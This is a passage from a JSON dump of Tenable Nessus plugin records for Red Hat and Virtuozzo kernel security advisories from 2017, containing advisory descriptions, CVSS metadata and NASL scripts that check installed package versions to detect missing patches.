value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0931\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-514.16.1.rt56.437.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:37", "references": ["https://access.redhat.com/security/cve/cve-2016-9793", "https://access.redhat.com/security/cve/cve-2017-2636", "https://access.redhat.com/security/cve/cve-2017-6074", "https://access.redhat.com/security/cve/cve-2016-8650", "https://access.redhat.com/errata/RHSA-2017:0932", "https://access.redhat.com/security/cve/cve-2017-2618"], "pluginID": "99345", "description": "An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's\nDatagram Congestion Control Protocol (DCCP) implementation freed SKB\n(socket buffer) resources for a DCCP_PKT_REQUEST packet when the\nIPV6_RECVPKTINFO option is set on the socket. A local, unprivileged\nuser could use this flaw to alter the kernel memory, allowing them to\nescalate their privileges on the system. (CVE-2017-6074, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636; Andrey Konovalov (Google) for reporting CVE-2017-6074;\nand Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618\nissue was discovered by Paul Moore (Red Hat Engineering).\n\nBug Fix(es) :\n\n* The kernel-rt packages have been upgraded to version\n3.10.0-514.rt56.219, which provides a number of bug fix updates over\nthe previous version. (BZ# 1429613)", "edition": 12, "reporter": "Tenable", "published": "2017-04-13T00:00:00", "title": "RHEL 6 : MRG (RHSA-2017:0932)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2017-6074", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2017-0932.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99345", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0932. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99345);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\", \"CVE-2017-6074\");\n script_xref(name:\"RHSA\", value:\"2017:0932\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2017:0932)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's\nDatagram Congestion Control Protocol (DCCP) implementation freed SKB\n(socket buffer) resources for a DCCP_PKT_REQUEST packet when the\nIPV6_RECVPKTINFO option is set on the socket. A local, unprivileged\nuser could use this flaw to alter the kernel memory, allowing them to\nescalate their privileges on the system. (CVE-2017-6074, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636; Andrey Konovalov (Google) for reporting CVE-2017-6074;\nand Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618\nissue was discovered by Paul Moore (Red Hat Engineering).\n\nBug Fix(es) :\n\n* The kernel-rt packages have been upgraded to version\n3.10.0-514.rt56.219, which provides a number of bug fix updates over\nthe previous version. (BZ# 1429613)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-2636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-6074\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0932\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.10.0-514.rt56.219.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.10.0-514.rt56.219.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:27:55", "references": ["http://www.nessus.org/u?96946551", "https://access.redhat.com/errata/RHSA-2017-0933"], "pluginID": "101449", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 11, "reporter": "Tenable", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0933)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Virtuozzo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-20T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs", "p-cpe:/a:virtuozzo:virtuozzo:kernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools", "cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:kernel-headers", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists", "p-cpe:/a:virtuozzo:virtuozzo:kernel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-perf", "p-cpe:/a:virtuozzo:virtuozzo:kernel-doc", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:perf"], "id": "VIRTUOZZO_VZLSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101449", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101449);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-2636\"\n );\n\n script_name(english:\"Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0933)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red 